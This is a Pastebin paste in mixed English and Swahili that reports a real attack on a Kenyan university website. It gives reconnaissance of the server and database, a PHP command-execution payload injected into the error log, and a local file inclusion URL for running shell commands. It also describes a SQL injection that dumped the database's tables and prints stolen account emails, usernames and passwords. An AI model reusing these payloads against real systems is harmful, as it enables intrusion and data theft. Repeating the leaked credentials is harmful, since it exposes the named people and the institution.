API tools faq
paste
Advertisement
akajaymo

Untitled

akajaymo
Jul 26th, 2011
323
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.71 KB | None | 0 0
raw download clone embed print report
  1. Morning @lexxkinyanjui
  2.  
  3. Exploit target:www.jkuat.ac.ke
  4. Host IP:41.204.161.16
  5. Web Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/1.0.0d FrontPage/5.0.2.2635 mod_auth_passthrough/2.1 mod_bwlimited/1.4 mod_perl/2.0.5 Perl/v5.12.3
  6. Powered-by: PHP/5.3.6
  7. DB Server: MySQL >=5
  8. Current User: jkuat_jkuat@localhost
  9. Sql Version: 5.1.58-log
  10. Current DB: jkuat_jkuat
  11. System User: jkuat_jkuat@localhost
  12. Host Name: cp-uon.kenet.or.ke
  13. Installation dir: /usr/local/
  14. DB User: 'jkuat_jkuat'@'localhost'
  15.  
  16.  
  17. Data Bases: information_schema
  18. jkuat_jkuat
  19.  
  20. With hii info you can chose the attack you want because you have the DB and server type:
  21. If unataka an RFI or LFI attack you can use some of my code:
  22.  
  23. http://www.jkuat.ac.ke/jamesscript=<? passthru(\$_GET[cmd]) ?>
  24. This will add a line into error_log injecting my code . And
  25. now? we only have to load this file send
  26. by cmd variable the command we'd like to execute:
  27.  
  28. for example:http://www.jkuat.ac.ke/?file=../../../var/apache/error_log&cmd=uname -a
  29.  
  30. But this will be risky because they can resolve ur address and/are location,plus windows is not that advanced
  31. to handle more than 200port connections:
  32.  
  33. so SQL injection with ' working a little magic here is what i got:
  34. DATABASE:jkuat_jkuat
  35.  
  36. Table Name Columns
  37. tbl_user email password username
  38. tbl_units
  39. tbl_section
  40. tbl_programme_category
  41. tbl_programme
  42. tbl_links
  43. tbl_head
  44. tbl_faculty
  45. tbl_downloads_category
  46. tbl_downloads
  47. tbl_department
  48. tbl_contacts_main
  49. tbl_contacts
  50. tbl_comments
  51. tbl_campus_programme
  52. tbl_campus
  53. tbl_article
  54. tbl_announcement
  55.  
  56.  
  57. sasa kutoka hapo kama tuna table ya users ambayo ina email,passwords and username tuna spoof tena
  58. and we get
  59. email password username
  60. info@jkuat.ac.ke admin 89admin245
  61. kamochu@gmail.com kamochu001 kamochu
  62.  
  63.  
  64. DATABASE:information_schema
  65. Table Name Columns
  66. VIEWS
  67. USER_PRIVILEGES IS_GRANTABLE PRIVILEGE_TYPE TABLE_CATALOG GRANTEE
  68. TRIGGERS
  69. TABLE_PRIVILEGES
  70. TABLE_CONSTRAINTS
  71. TABLES
  72. STATISTICS
  73. SESSION_VARIABLES VARIABLE_VALUE VARIABLE_NAME
  74. SESSION_STATUS
  75. SCHEMA_PRIVILEGES
  76. SCHEMATA SQL_PATH DEFAULT_COLLATION_NAME DEFAULT_CHARACTER_SET_NAME SCHEMA_NAME CATALOG_NAME
  77. ROUTINES
  78. REFERENTIAL_CONSTRAINTS
  79. PROFILING SOURCE_LINE SOURCE_FILE SOURCE_FUNCTION SWAPS PAGE_FAULTS_MINOR PAGE_FAULTS_MAJOR MESSAGES_RECEIVED MESSAGES_SENT BLOCK_OPS_OUT BLOCK_OPS_IN CONTEXT_INVOLUNTARY CONTEXT_VOLUNTARY CPU_SYSTEM CPU_USER DURATION STATE SEQ QUERY_ID
  80. PROCESSLIST
  81. PLUGINS
  82. PARTITIONS
  83. KEY_COLUMN_USAGE
  84. GLOBAL_VARIABLES
  85. GLOBAL_STATUS
  86. FILES
  87. EVENTS
  88. ENGINES
  89. COLUMN_PRIVILEGES
  90. COLUMNS
  91. COLLATION_CHARACTER_SET_APPLICABILITY
  92. COLLATIONS
  93. CHARACTER_SETS
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!